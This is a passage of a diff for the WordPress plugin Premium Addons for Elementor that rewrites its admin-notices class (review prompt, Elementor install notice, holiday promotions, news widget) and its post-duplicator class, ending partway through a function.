-	 *
-	 * @return object
-	 */
-	public static function get_instance() {
-
-		if ( ! isset( self::$instance ) ) {
-
-			self::$instance = new self();
-
-		}
-
-		return self::$instance;
-	}
-}
+<?php
+/**
+ * PA Admin Notices.
+ */
+
+namespace PremiumAddonsAdminIncludes;
+
+use PremiumAddonsIncludesHelper_Functions;
+
+if ( ! defined( 'ABSPATH' ) ) {
+	exit();
+}
+
+/**
+ * Class Admin_Notices
+ */
+class Admin_Notices {
+
+	/**
+	 * Premium Addons Stories
+	 *
+	 * @var stories
+	 */
+	private $stories = array();
+
+	/**
+	 * Class object
+	 *
+	 * @var instance
+	 */
+	private static $instance = null;
+
+	/**
+	 * Elementor slug
+	 *
+	 * @var elementor
+	 */
+	private static $elementor = 'elementor';
+
+	/**
+	 * PAPRO Slug
+	 *
+	 * @var papro
+	 */
+	private static $papro = 'premium-addons-pro';
+
+	/**
+	 * Notices Keys
+	 *
+	 * @var notices
+	 */
+	private static $notices = null;
+
+	/**
+	 * Constructor for the class
+	 */
+	public function __construct() {
+
+		add_action( 'admin_init', array( $this, 'init' ) );
+
+		add_action( 'admin_notices', array( $this, 'admin_notices' ) );
+
+		add_action( 'admin_enqueue_scripts', array( $this, 'admin_enqueue_scripts' ) );
+
+		add_action( 'wp_ajax_pa_reset_admin_notice', array( $this, 'reset_admin_notice' ) );
+
+		add_action( 'wp_ajax_pa_dismiss_admin_notice', array( $this, 'dismiss_admin_notice' ) );
+
+		self::$notices = array(
+			'pa-review',
+			'bf25-last-not',
+		);
+
+		if ( Helper_Functions::check_hide_notifications() ) {
+			return;
+		}
+
+		add_action( 'wp_dashboard_setup', array( $this, 'show_story_widget' ), 111 );
+	}
+
+	/**
+	 * Init
+	 *
+	 * Init required functions
+	 *
+	 * The redirection happens on the first admin page after activation ( the plugins page ).
+	 *
+	 * @since 1.0.0
+	 * @access public
+	 */
+	public function init() {
+
+		$this->handle_review_notice();
+
+		if ( Helper_Functions::check_elementor_version() && get_transient( 'pa_activation_redirect' ) ) {
+
+			delete_transient( 'pa_activation_redirect' );
+
+			$redirect = add_query_arg(
+				array(
+					'page' => 'pa-setup-wizard', // this mean it should've been added first.
+				),
+				admin_url( 'admin.php' )
+			);
+
+			wp_safe_redirect( $redirect );
+
+			exit;
+		}
+	}
+
+	/**
+	 * Init notices check functions.
+	 */
+	public function admin_notices() {
+
+		// Skip rendering notices during AJAX requests.
+		if ( wp_doing_ajax() ) {
+			return;
+		}
+
+		$this->required_plugins_check();
+
+		// Make sure "Already did" was not clicked before.
+		$show_review = get_option( 'pa_review_notice' );
+		if ( '1' !== $show_review ) {
+
+			$cache_key = 'pa_review_notice';
+
+			$response = get_transient( $cache_key );
+
+			if ( false == $response ) {
+				$this->show_review_notice();
+			}
+		}
+
+		if ( Helper_Functions::check_hide_notifications() ) {
+			return;
+		}
+
+		// $this->get_black_friday_notice();
+	}
+
+	/**
+	 * Handle Review Notice
+	 *
+	 * Checks if review message is dismissed.
+	 *
+	 * @access public
+	 * @return void
+	 */
+	public function handle_review_notice() {
+
+		if ( ! isset( $_GET['pa_review'] ) ) {
+			return;
+		}
+
+		if ( 'opt_out' === $_GET['pa_review'] ) {
+			check_admin_referer( 'opt_out' );
+
+			update_option( 'pa_review_notice', '1' );
+		}
+
+		wp_safe_redirect( remove_query_arg( 'pa_review' ) );
+
+		exit;
+	}
+
+	/**
+	 * Required plugin check
+	 *
+	 * Shows an admin notice when Elementor is missing.
+	 *
+	 * @since 1.0.0
+	 * @access public
+	 */
+	public function required_plugins_check() {
+
+		// Early return if Elementor is already active.
+		if ( Helper_Functions::check_elementor_version() ) {
+			return;
+		}
+
+		$elementor_path = sprintf( '%1$s/%1$s.php', self::$elementor );
+
+		$message = '';
+
+		if ( ! Helper_Functions::is_plugin_installed( $elementor_path ) ) {
+
+			if ( ! Admin_Helper::check_user_can( 'install_plugins' ) ) {
+				return;
+			}
+
+			$install_url = wp_nonce_url( self_admin_url( sprintf( 'update.php?action=install-plugin&plugin=%s', self::$elementor ) ), 'install-plugin_elementor' );
+
+			$message = sprintf( '<p>%s</p>', __( 'Premium Addons for Elementor is not working because you need to Install Elementor plugin.', 'premium-addons-for-elementor' ) );
+
+			$message .= sprintf( '<p><a href="%s" class="button-primary">%s</a></p>', $install_url, __( 'Install Now', 'premium-addons-for-elementor' ) );
+
+		} elseif ( Admin_Helper::check_user_can( 'activate_plugins' ) ) {
+
+			$activation_url = wp_nonce_url( 'plugins.php?action=activate&plugin=' . $elementor_path . '&plugin_status=all&paged=1&s', 'activate-plugin_' . $elementor_path );
+
+			$message = '<p>' . __( 'Premium Addons for Elementor is not working because you need to activate Elementor plugin.', 'premium-addons-for-elementor' ) . '</p>';
+
+			$message .= '<p>' . sprintf( '<a href="%s" class="button-primary">%s</a>', $activation_url, __( 'Activate Now', 'premium-addons-for-elementor' ) ) . '</p>';
+		} else {
+			return;
+		}
+
+		if ( ! empty( $message ) ) {
+			$this->render_admin_notices( $message );
+		}
+	}
+
+	/**
+	 * Get Review Text
+	 *
+	 * Gets admin review notice HTML.
+	 *
+	 * @since 2.8.4
+	 * @access public
+	 *
+	 * @param string $review_url plugin page.
+	 * @param string $optout_url redirect url.
+	 */
+	public function get_review_text( $review_url, $optout_url ) {
+
+		$notice = sprintf(
+			'<p>' . __( 'Could we take just 2 minutes of your time? We'd be incredibly grateful if you could give ', 'premium-addons-for-elementor' ) .
+			'<b>' . __( 'Premium Addons for Elementor', 'premium-addons-for-elementor' ) . '</b> a 5 Stars Rating on WordPress.org. Your support helps us continue creating even more amazing free features in the future!</p>
+            <div>
+                <a class="button pa-review-btn button-primary" href="%s" target="_blank"><span>' . __( 'Sure, leave a Review', 'premium-addons-for-elementor' ) . '</span></a>
+                <a class="button" href="%2$s"><span>' . __( 'I Already Did', 'premium-addons-for-elementor' ) . '</span></a>
+                <a class="button button-secondary pa-notice-reset"><span>' . __( 'Maybe Later', 'premium-addons-for-elementor' ) . '</span></a>
+            </div>',
+			$review_url,
+			$optout_url
+		);
+
+		return $notice;
+	}
+
+	/**
+	 * Checks if review admin notice is dismissed
+	 *
+	 * @since 2.6.8
+	 * @return void
+	 */
+	public function show_review_notice() {
+
+		$review_url = 'https://wordpress.org/support/plugin/premium-addons-for-elementor/reviews/#new-post';
+
+		$optout_url = wp_nonce_url( add_query_arg( 'pa_review', 'opt_out' ), 'opt_out' );
+		?>
+
+		<div class="error pa-notice-wrap pa-review-notice" data-notice="pa-review">
+			<div class="pa-img-wrap">
+				<img src="<?php echo esc_url( PREMIUM_ADDONS_URL . 'admin/images/pa-logo-symbol.png' ); ?>">
+			</div>
+			<div class="pa-text-wrap">
+				<?php echo wp_kses_post( $this->get_review_text( $review_url, $optout_url ) ); ?>
+			</div>
+			<div class="pa-notice-close">
+				<a href="<?php echo esc_url( $optout_url ); ?>"><span class="dashicons dashicons-dismiss"></span></a>
+			</div>
+		</div>
+
+		<?php
+	}
+
+	public function get_black_friday_notice() {
+
+		$time = time();
+
+		if ( $time > 1765497600 || '1' === get_option( 'bf25-last-not' ) ) {
+			return;
+		}
+
+		$is_papro_active = Helper_Functions::check_papro_version();
+
+		$license_key = get_option( 'papro_license_key' );
+
+		$link = Helper_Functions::get_campaign_link( 'https://premiumaddons.com/black-friday/#bfdeals', 'wp-dash', 'bf25-notification', 'cm25' );
+
+		$promotion_type = 'new';
+
+		if ( $is_papro_active ) {
+
+			$license_data = get_transient( 'pa_license_info' );
+
+			if ( isset( $license_data['status'] ) && 'valid' === $license_data['status'] ) {
+
+				if ( isset( $license_data['id'] ) && '4' === $license_data['id'] ) {
+					return;
+				} else {
+
+					$promotion_type = 'upgrade';
+
+					$link = Helper_Functions::get_campaign_link( 'https://premiumaddons.com/docs/upgrade-premium-addons-license/', 'wp-dash', 'bf25-notification', 'cm25' );
+				}
+			}
+		}
+
+		$message = $this->get_promotion_message( $promotion_type );
+
+		?>
+
+		<div class="error pa-notice-wrap pa-new-feature-notice pa-review-notice">
+			<div class="pa-img-wrap">
+				<img src="<?php echo PREMIUM_ADDONS_URL . 'admin/images/pa-logo-symbol.png'; ?>">
+			</div>
+			<div class="pa-text-wrap">
+				<p>
+					<?php echo wp_kses_post( $message['message'] ); ?>
+					<a class="button pa-cta-btn button-primary" href="<?php echo esc_url( $link ); ?>" target="_blank">
+						<span><?php echo wp_kses_post( $message['cta'] ); ?></span>
+					</a>
+				</p>
+			</div>
+			<div class="pa-notice-close" data-notice="bf25-last-not">
+				<span class="dashicons dashicons-dismiss"></span>
+			</div>
+		</div>
+
+		<?php
+	}
+
+	/**
+	 * Get Promotion Message
+	 *
+	 * @since 4.11.43
+	 * @access private
+	 *
+	 * @param string $type promotion type.
+	 * @return array
+	 */
+	private function get_promotion_message( $type = 'new' ) {
+
+		if ( 'upgrade' === $type ) {
+			return array(
+				'message' => __( 'Get a <b>FLAT 35% OFF</b> when you upgrade to <b>Premium Addons Pro Lifetime</b>. Use code <b>BFUL2025</b> at checkout – <b>expires soon!</b>', 'premium-addons-for-elementor' ),
+				'cta'     => __( 'Upgrade Now', 'premium-addons-for-elementor' ),
+			);
+
+		}
+
+		return array(
+			'message' => __( '<b>Cyber Monday – Save Up To $105 on Premium Addons Pro</b>.', 'premium-addons-for-elementor' ),
+			'cta'     => __( 'Catch The Deal', 'premium-addons-for-elementor' ),
+		);
+	}
+
+	/**
+	 * Renders an admin notice error message
+	 *
+	 * @since 1.0.0
+	 * @access private
+	 *
+	 * @param string $message notice text.
+	 * @param string $class notice class.
+	 * @param string $handle notice handle.
+	 *
+	 * @return void
+	 */
+	private function render_admin_notices( $message, $class = '', $handle = '' ) {
+		?>
+			<div class="error pa-new-feature-notice <?php echo esc_attr( $class ); ?>" data-notice="<?php echo esc_attr( $handle ); ?>">
+				<?php echo wp_kses_post( $message ); ?>
+			</div>
+		<?php
+	}
+
+
+
+	/**
+	 * Register admin scripts
+	 *
+	 * @since 3.2.8
+	 * @access public
+	 */
+	public function admin_enqueue_scripts() {
+
+		// Skip loading scripts during AJAX or REST requests.
+		if ( wp_doing_ajax() || ( defined( 'REST_REQUEST' ) && REST_REQUEST ) ) {
+			return;
+		}
+
+		wp_enqueue_script(
+			'pa-dashboard',
+			PREMIUM_ADDONS_URL . 'admin/assets/js/pa-dashboard.js',
+			array( 'jquery' ),
+			PREMIUM_ADDONS_VERSION,
+			true
+		);
+
+		wp_localize_script(
+			'pa-dashboard',
+			'PaNoticeSettings',
+			array(
+				'ajaxurl' => esc_url( admin_url( 'admin-ajax.php' ) ),
+				'nonce'   => wp_create_nonce( 'pa-notice-nonce' ),
+			)
+		);
+	}
+
+	/**
+	 * Set transient for admin notice
+	 *
+	 * @since 3.2.8
+	 * @access public
+	 *
+	 * @return void
+	 */
+	public function reset_admin_notice() {
+
+		check_ajax_referer( 'pa-notice-nonce', 'nonce' );
+
+		if ( ! Admin_Helper::check_user_can( 'manage_options' ) ) {
+			wp_send_json_error();
+		}
+
+		$key = isset( $_POST['notice'] ) ? sanitize_text_field( wp_unslash( $_POST['notice'] ) ) : '';
+
+		if ( ! empty( $key ) && in_array( $key, self::$notices, true ) ) {
+
+			$cache_key = 'pa_review_notice';
+
+			set_transient( $cache_key, true, WEEK_IN_SECONDS );
+
+			wp_send_json_success();
+
+		} else {
+
+			wp_send_json_error();
+
+		}
+	}
+
+	/**
+	 * Dismiss admin notice
+	 *
+	 * @since 3.11.7
+	 * @access public
+	 *
+	 * @return void
+	 */
+	public function dismiss_admin_notice() {
+
+		check_ajax_referer( 'pa-notice-nonce', 'nonce' );
+
+		if ( ! current_user_can( 'manage_options' ) ) {
+			wp_send_json_error();
+		}
+
+		$key = isset( $_POST['notice'] ) ? sanitize_text_field( wp_unslash( $_POST['notice'] ) ) : '';
+
+		if ( ! empty( $key ) && in_array( $key, self::$notices, true ) ) {
+
+			// Make sure new features notices will not appear again.
+			if ( false != strpos( $key, 'not' ) ) {
+				update_option( $key, '1' );
+			} else {
+				set_transient( $key, true, 20 * DAY_IN_SECONDS );
+
+			}
+
+			wp_send_json_success();
+
+		} else {
+
+			wp_send_json_error();
+
+		}
+	}
+
+	/**
+	 * Check Status
+	 *
+	 * @since 4.10.15
+	 * @access public
+	 */
+	public function check_status( $key ) {
+
+		$status = false;
+
+		$api_params = array(
+			'edd_action' => 'check_license',
+			'license'    => $key,
+			'item_id'    => 361,
+		);
+
+		$response = wp_remote_get(
+			'http://my.leap13.com',
+			array(
+				'timeout'   => 15,
+				'sslverify' => false,
+				'body'      => $api_params,
+			)
+		);
+
+		if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) {
+			return false;
+		}
+
+		$body = wp_remote_retrieve_body( $response );
+
+		$body = json_decode( $body, true );
+
+		if ( isset( $body['license'] ) && 'valid' === $body['license'] ) {
+			$status = true;
+		}
+
+		return $status;
+	}
+
+	/**
+	 * Get PA Stories
+	 *
+	 * Gets a list of the latest three blog posts
+	 *
+	 * @since 4.10.64
+	 *
+	 * @access public
+	 */
+	public function get_pa_stories() {
+
+		$stories = get_transient( 'pa_stories_' . PREMIUM_ADDONS_VERSION );
+
+		if ( ! $stories ) {
+
+			$api_url = 'https://premiumaddons.com/wp-json/stories/v2/get';
+
+			$response = wp_remote_get(
+				$api_url,
+				array(
+					'timeout'   => 15,
+					'sslverify' => true,
+				)
+			);
+
+			if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) {
+				set_transient( 'pa_stories_' . PREMIUM_ADDONS_VERSION, true, WEEK_IN_SECONDS );
+				return false;
+			}
+
+			$body    = wp_remote_retrieve_body( $response );
+			$stories = json_decode( $body, true );
+
+			set_transient( 'pa_stories_' . PREMIUM_ADDONS_VERSION, $stories, WEEK_IN_SECONDS );
+
+		}
+
+		$this->stories = $stories;
+
+		return $stories;
+	}
+
+	public function show_story_widget() {
+
+		$stories = $this->get_pa_stories();
+
+		if ( ! is_array( $stories ) || empty( $stories ) ) {
+			return;
+		}
+
+		wp_add_dashboard_widget(
+			'pa-stories',
+			__( 'Premium Addons News', 'premium-addons-for-elementor' ),
+			array( $this, 'show' ),
+			null,
+			null,
+			'column3',
+			'core'
+		);
+	}
+
+
+	public function show() {
+
+		$stories = $this->stories;
+
+		$time = time();
+
+		$papro_path = 'premium-addons-pro/premium-addons-pro-for-elementor.php';
+
+		$license_data = get_transient( 'pa_license_info' );
+		$highlight    = false;
+
+		if ( isset( $license_data['status'] ) && 'valid' === $license_data['status'] ) {
+
+			if ( isset( $license_data['id'] ) && '4' !== $license_data['id'] ) {
+
+				$highlight = true;
+				array_unshift(
+					$stories['posts'],
+					array(
+						'title' => 'Switch to Premium Addons Pro Lifetime, Pay the Difference & Save 30% Today!',
+						'link'  => Helper_Functions::get_campaign_link( 'https://premiumaddons.com/docs/upgrade-premium-addons-license/', 'wp-dash', 'xmas25-dash-widget', 'xmas25' ),
+					)
+				);
+
+			}
+		}
+
+		?>
+			<style>
+				.pa-banners-grid {
+					margin-bottom: 10px;
+				}
+
+				.pa-stories-banner {
+					position: relative;
+				}
+
+				.pa-stories-banner a {
+					position: absolute;
+					inset: 0;
+				}
+
+				.pa-story-img-container img {
+					width: 100%;
+					display: block;
+				}
+
+				.pa-news-post {
+					margin-bottom: 5px;
+				}
+
+				.pa-news-post a {
+					font-weight: 500;
+					color: #0073aa;
+					text-decoration: none;
+					padding-bottom: 5px;
+					display: inline-block;
+				}
+
+				.pa-dashboard-widget-block {
+					width: 100%;
+				}
+
+				.pa-footer-bar {
+					border-top: 1px solid #eee;
+					padding-top: 1rem;
+					display: flex;
+					justify-content: space-between;
+				}
+
+				.pa-dashboard-widget-block a {
+					text-decoration: none;
+					font-size: 13px;
+					color: #007cba;
+				}
+
+				.pa-dashboard-widget-block .dashicons {
+					vertical-align: middle;
+					font-size: 17px;
+				}
+			</style>
+
+
+			<div class="pa-banners-grid">
+
+				<?php foreach ( $stories['banners'] as $index => $banner ) : ?>
+
+					<?php if ( isset( $banner['end'] ) && $time < $banner['end'] ) : ?>
+
+						<div class="pa-stories-banner">
+							<div class="pa-story-img-container">
+								<img src="<?php echo esc_url( $banner['image'] ); ?>" alt="<?php echo esc_attr( $banner['description'] ); ?>">
+							</div>
+							<a href="<?php echo esc_url( Helper_Functions::get_campaign_link( $banner['link'], 'wp-dash', 'dash-widget', 'xmas25' ) ); ?>" target="_blank" title="<?php echo esc_attr( $banner['description'] ); ?>"></a>
+						</div>
+
+					<?php endif; ?>
+
+				<?php endforeach; ?>
+
+			</div>
+
+
+			<div class="pa-posts-grid">
+
+				<?php foreach ( $stories['posts'] as $index => $post ) : ?>
+
+					<div class="pa-news-post">
+						<a style="<?php echo 0 === $index && $highlight ? 'color: #93003f' : ''; ?>" target="_blank" href="<?php echo esc_url( $post['link'] ); ?>">
+							<?php echo wp_kses_post( $post['title'] ); ?>
+						</a>
+					</div>
+
+				<?php endforeach; ?>
+
+			</div>
+
+			<div class="pa-dashboard-widget-block">
+				<div class="pa-footer-bar">
+					<a href="https://wordpress.org/support/plugin/premium-addons-for-elementor/" target="_blank" style="color: #27ae60">
+						Need Help?
+						<span aria-hidden="true" class="dashicons dashicons-external"></span>
+					</a>
+					<a href="https://www.youtube.com/leap13" target="_blank" style="color: #e1002d">
+						YouTube Channel
+						<span aria-hidden="true" class="dashicons dashicons-youtube"></span>
+					</a>
+					<a href="https://www.facebook.com/groups/PremiumAddons" target="_blank" style="color: #1877F2;">
+						Facebook Community
+						<span aria-hidden="true" class="dashicons dashicons-facebook-alt"></span>
+					</a>
+				</div>
+			</div>
+
+		<?php
+	}
+
+	/**
+	 * Creates and returns an instance of the class
+	 *
+	 * @since 2.8.4
+	 * @access public
+	 *
+	 * @return object
+	 */
+	public static function get_instance() {
+
+		if ( ! isset( self::$instance ) ) {
+
+			self::$instance = new self();
+
+		}
+
+		return self::$instance;
+	}
+}
--- a/premium-addons-for-elementor/admin/includes/duplicator.php
+++ b/premium-addons-for-elementor/admin/includes/duplicator.php
@@ -1,271 +1,271 @@
-<?php
-/**
- * PA Duplicator.
- */
-
-namespace PremiumAddonsAdminIncludes;
-
-use ElementorCoreFilesCSSPost as Post_CSS;
-
-if ( ! defined( 'ABSPATH' ) ) {
-	exit();
-}
-
-/**
- * Class Duplicator
- */
-class Duplicator {
-
-	/**
-	 * PA Duplicator action.
-	 */
-	const DUPLICATE_ACTION = 'pa_duplicator';
-
-	/**
-	 * Class object
-	 *
-	 * @var instance
-	 */
-	private static $instance = null;
-
-	/**
-	 * Constructor for the class
-	 */
-	public function __construct() {
-
-		add_action( 'admin_action_' . self::DUPLICATE_ACTION, array( $this, 'duplicate_post' ) );
-
-		add_filter( 'post_row_actions', array( $this, 'add_duplicator_actions' ), 10, 2 );
-
-		add_filter( 'page_row_actions', array( $this, 'add_duplicator_actions' ), 10, 2 );
-	}
-
-	/**
-	 * Add Duplicator Actions
-	 *
-	 * Add duplicator action links to posts/pages
-	 *
-	 * @access public
-	 * @since 3.9.7
-	 *
-	 * @param array  $actions row actions.
-	 * @param object $post WP_Post.
-	 * @return array
-	 */
-	public function add_duplicator_actions( $actions, $post ) {
-
-		if ( current_user_can( 'edit_others_posts' ) && post_type_supports( $post->post_type, 'elementor' ) ) {
-
-			$actions[ self::DUPLICATE_ACTION ] = sprintf(
-				'<a href="%1$s" title="%2$s"><span class="screen-reader-text">%2$s</span>%3$s</a>',
-				esc_url( self::get_duplicate_url( $post->ID ) ),
-				/* translators: %s: Post Title */
-				sprintf( esc_attr__( 'Duplicate - %s', 'premium-addons-for-elementor' ), esc_attr( $post->post_title ) ),
-				__( 'PA Duplicate', 'premium-addons-for-elementor' )
-			);
-
-		}
-
-		return $actions;
-	}
-
-	/**
-	 * Get duplicate url
-	 *
-	 * @access public
-	 * @since 3.9.7
-	 *
-	 * @param integer $post_id item ID.
-	 * @return string
-	 */
-	public static function get_duplicate_url( $post_id ) {
-
-		$paged = ( get_query_var( 'paged' ) ) ? get_query_var( 'paged' ) : 1;
-
-		return wp_nonce_url(
-			add_query_arg(
-				array(
-					'action'  => self::DUPLICATE_ACTION,
-					'post_id' => $post_id,
-					'paged'   => $paged,
-				),
-				admin_url( 'admin.php' )
-			),
-			self::DUPLICATE_ACTION
-		);
-	}
-
-	/**
-	 * Duplicate required post/page
-	 *
-	 * @access public
-	 * @since 3.9.7
-	 *
-	 * @return void
-	 */
-	public function duplicate_post() {
-
-		$nonce   = isset( $_GET['_wpnonce'] ) ? sanitize_text_field( wp_unslash( $_GET['_wpnonce'] ) ) : '';
-		$post_id = isset( $_GET['post_id'] ) ? absint( $_GET['post_id'] ) : 0;
-		$paged   = isset( $_GET['paged'] ) ? absint( $_GET['paged'] ) : 1;
-
-		if ( ! current_user_can( 'edit_post', $post_id ) ) {
-			return;
-		}
-
-		if ( ! wp_verify_nonce( $nonce, self::DUPLICATE_ACTION ) ) {
-			return;
-		}
-
-		$post = get_post( $post_id );
-		if ( is_null( $post ) ) {
-			return;
-		}
-
-		$post = sanitize_post( $post, 'db' );
-
-		$duplicated_post_id = self::insert_post( $post );
-
-		$redirect = add_query_arg(
-			array(
-				'post_type' => $post->post_type,
-				'paged'     => $paged,
-			),
-			admin_url( 'edit.php' )
-		);
-
-		if ( ! is_wp_error( $duplicated_post_id ) ) {
-
-			self::duplicate_post_taxonomies( $post, $duplicated_post_id );
-			self::duplicate_post_meta_data( $post_id, $duplicated_post_id );
-
-			$css = Post_CSS::create( $duplicated_post_id );
-			$css->update();
-
-		}
-
-		wp_safe_redirect( $redirect );
-		die();
-	}
-
-	/**
-	 * Duplicate required post/page
-	 *
-	 * @access public
-	 * @since 3.9.7
-	 *
-	 * @param object $post WP_Post.
-	 */
-	protected static function insert_post( $post ) {
-
-		$current_user = wp_get_current_user();
-
-		$post_meta = get_post_meta( $post->ID );
-
-		$duplicated_post_args = array(
-			'post_status'    => 'draft',
-			'post_type'      => $post->post_type,
-			'post_parent'    => $post->post_parent,
-			'post_content'   => $post->post_content,
-			'menu_order'     => $post->menu_order,
-			'ping_status'    => $post->ping_status,
-			'post_excerpt'   => $post->post_excerpt,
-			'post_password'  => $post->post_password,
-			'comment_status' => $post->comment_status,
-			'to_ping'        => $post->to_ping,
-			'post_author'    => $current_user->ID,
-			'post_title'     => sprintf(
-				/* translators: 1: Post Title, 2: Post ID */
-				__( '%1$s - Duplicate - [#%2$d]', 'premium-addons-for-elementor' ),
-				$post->post_title,
-				$post->ID
-			),
-		);
-
-		if ( isset( $post_meta['_elementor_edit_mode'][0] ) ) {
-
-			$data = array(
-				'meta_input' => array(
-					'_elementor_edit_mode'     => $post_meta['_elementor_edit_mode'][0],
-					'_elementor_template_type' => $post_meta['_elementor_template_type'][0],
-				),
-			);
-
-			$duplicated_post_args = array_merge( $duplicated_post_args, $data );
-
-		}
-
-		return wp_insert_post( $duplicated_post_args );
-	}
-
-	/**
-	 * Add post taxonomies to the cloned version
-	 *
-	 * @access public
-	 * @since 3.9.7
-	 *
-	 * @param object  $post WP_Post.
-	 * @param integer $id item ID.
-	 */
-	public static function duplicate_post_taxonomies( $post, $id ) {
-
-		$taxonomies = array_map( 'sanitize_text_field', get_object_taxonomies( $post->post_type ) );
-
-		if ( ! empty( $taxonomies ) && is_array( $taxonomies ) ) {
-			foreach ( $taxonomies as $taxonomy ) {
-				$terms = wp_get_object_terms( $post->ID, $taxonomy, array( 'fields' => 'slugs' ) );
-				wp_set_object_terms( $id, $terms, $taxonomy, false );
-			}
-		}
-	}
-
-	/**
-	 * Add post meta data to the cloned version
-	 *
-	 * @access public
-	 * @since 3.9.7
-	 *
-	 * @param object  $post WP_Post.
-	 * @param integer $id item ID.
-	 */
-	public static function duplicate_post_meta_data( $old_id, $new_id ) {
-
-		$post_meta_keys = get_post_custom_keys( $old_id );
-
-		if ( ! empty( $post_meta_keys ) ) {
-
-			foreach ( $post_meta_keys as $meta_key ) {
-
-				$meta_values = get_post_custom_values( $meta_key, $old_id );
-
-				foreach ( $meta_values as $meta_value ) {
-
-					$meta_value = maybe_unserialize( $meta_value );
-
-					update_post_meta( $new_id, $meta_key, wp_slash( $meta_value ) );
-
-				}
-			}
-		}
-	}
-
-
-	/**
-	 * Creates and returns an instance of the class
-	 *
-	 * @since 3.20.9
-	 * @access public
-	 *
-	 * @return object
-	 */
-	public static function get_instance() {
-
-		if ( ! isset( self::$instance ) ) {
-
-			self::$instance = new self();
-
-		}
-
-		return self::$instance;
-	}
-}
+<?php
+/**
+ * PA Duplicator.
+ */
+
+namespace PremiumAddonsAdminIncludes;
+
+use ElementorCoreFilesCSSPost as Post_CSS;
+
+if ( ! defined( 'ABSPATH' ) ) {
+	exit();
+}
+
+/**
+ * Class Duplicator
+ */
+class Duplicator {
+
+	/**
+	 * PA Duplicator action.
+	 */
+	const DUPLICATE_ACTION = 'pa_duplicator';
+
+	/**
+	 * Class object
+	 *
+	 * @var instance
+	 */
+	private static $instance = null;
+
+	/**
+	 * Constructor for the class
+	 */
+	public function __construct() {
+
+		add_action( 'admin_action_' . self::DUPLICATE_ACTION, array( $this, 'duplicate_post' ) );
+
+		add_filter( 'post_row_actions', array( $this, 'add_duplicator_actions' ), 10, 2 );
+
+		add_filter( 'page_row_actions', array( $this, 'add_duplicator_actions' ), 10, 2 );
+	}
+
+	/**
+	 * Add Duplicator Actions
+	 *
+	 * Add duplicator action links to posts/pages
+	 *
+	 * @access public
+	 * @since 3.9.7
+	 *
+	 * @param array  $actions row actions.
+	 * @param object $post WP_Post.
+	 * @return array
+	 */
+	public function add_duplicator_actions( $actions, $post ) {
+
+		if ( current_user_can( 'edit_others_posts' ) && post_type_supports( $post->post_type, 'elementor' ) ) {
+
+			$actions[ self::DUPLICATE_ACTION ] = sprintf(
+				'<a href="%1$s" title="%2$s"><span class="screen-reader-text">%2$s</span>%3$s</a>',
+				esc_url( self::get_duplicate_url( $post->ID ) ),
+				/* translators: %s: Post Title */
+				sprintf( esc_attr__( 'Duplicate - %s', 'premium-addons-for-elementor' ), esc_attr( $post->post_title ) ),
+				__( 'PA Duplicate', 'premium-addons-for-elementor' )
+			);
+
+		}
+
+		return $actions;
+	}
+
+	/**
+	 * Get duplicate url
+	 *
+	 * @access public
+	 * @since 3.9.7
+	 *
+	 * @param integer $post_id item ID.
+	 * @return string
+	 */
+	public static function get_duplicate_url( $post_id ) {
+
+		$paged = ( get_query_var( 'paged' ) ) ? get_query_var( 'paged' ) : 1;
+
+		return wp_nonce_url(
+			add_query_arg(
+				array(
+					'action'  => self::DUPLICATE_ACTION,
+					'post_id' => $post_id,
+					'paged'   => $paged,
+				),
+				admin_url( 'admin.php' )
+			),
+			self::DUPLICATE_ACTION
+		);
+	}
+
+	/**
+	 * Duplicate required post/page
+	 *
+	 * @access public
+	 * @since 3.9.7
+	 *
+	 * @return void
+	 */
+	public function duplicate_post() {
+
+		$nonce   = isset( $_GET['_wpnonce'] ) ? sanitize_text_field( wp_unslash( $_GET['_wpnonce'] ) ) : '';
+		$post_id = isset( $_GET['post_id'] ) ? absint( $_GET['post_id'] ) : 0;
+		$paged   = isset( $_GET['paged'] ) ? absint( $_GET['paged'] ) : 1;
+
+		if ( ! current_user_can( 'edit_post', $post_id ) ) {
+			return;
+		}
+
+		if ( ! wp_verify_nonce( $nonce, self::DUPLICATE_ACTION ) ) {
+			return;
+		}
+
+		$post = get_post( $post_id );
+		if ( is_null( $post ) ) {
+			return;
+		}
+
+		$post = sanitize_post( $post, 'db' );
+
+		$duplicated_post_id = self::insert_post( $post );
+
+		$redirect = add_query_arg(
+			array(
+				'post_type' => $post->post_type,
+				'paged'     => $paged,
+			),
+			admin_url( 'edit.php' )
+		);
+
+		if ( ! is_wp_error( $duplicated_post_id ) ) {
+
+			self::duplicate_post_taxonomies( $post, $duplicated_post_id );
+			self::duplicate_post_meta_data( $post_id, $duplicated_post_id );
+
+			$css = Post_CSS::create( $duplicated_post_id );
+			$css->update();
+
+		}
+
+		wp_safe_redirect( $redirect );
+		die();
+	}
+
+	/**
+	 * Duplicate required post/page
+	 *
+	 * @access public
+	 * @since 3.9.7
+	 *
+	 * @param object $post WP_Post.
+	 */
+	protected static function insert_post( $post ) {
+
+		$current_user = wp_get_current_user();
+
+		$post_meta = get_post_meta( $post->ID );
+
+		$duplicated_post_args = array(
+			'post_status'    => 'draft',
+			'post_type'      => $post->post_type,
+			'post_parent'    => $post->post_parent,
+			'post_content'   => $post->post_content,
+			'menu_order'     => $post->menu_order,
+			'ping_status'    => $post->ping_status,
+			'post_excerpt'   => $post->post_excerpt,
+			'post_password'  => $post->post_password,
+			'comment_status' => $post->comment_status,
+			'to_ping'        => $post->to_ping,
+			'post_author'    => $current_user->ID,
+			'post_title'     => sprintf(
+				/* translators: 1: Post Title, 2: Post ID */
+				__( '%1$s - Duplicate - [#%2$d]', 'premium-addons-for-elementor' ),
+				$post->post_title,
+				$post->ID
+			),
+		);
+
+		if ( isset( $post_meta['_elementor_edit_mode'][0] ) ) {
+
+			$data = array(
+				'meta_input' => array(
+					'_elementor_edit_mode'     => $post_meta['_elementor_edit_mode'][0],
+					'_elementor_template_type' => $post_meta['_elementor_template_type'][0],
+				),
+			);
+
+			$duplicated_post_args = array_merge( $duplicated_post_args, $data );
+
+		}
+
+		return wp_insert_post( $duplicated_post_args );
+	}
+
+	/**
+	 * Add post taxonomies to the cloned version
+	 *
+	 * @access public
+	 * @since 3.9.7
+	 *
+	 * @param object  $post WP_Post.
+	 * @param integer $id item ID.
+	 */
+	public static function duplicate_post_taxonomies( $post, $id ) {
+
+		$taxonomies = array_map( 'sanitize_text_field', get_object_taxonomies( $post->post_type ) );
+
+		if ( ! empty( $taxonomies ) && is_array( $taxonomies ) ) {
+			foreach ( $taxonomies as $taxonomy ) {
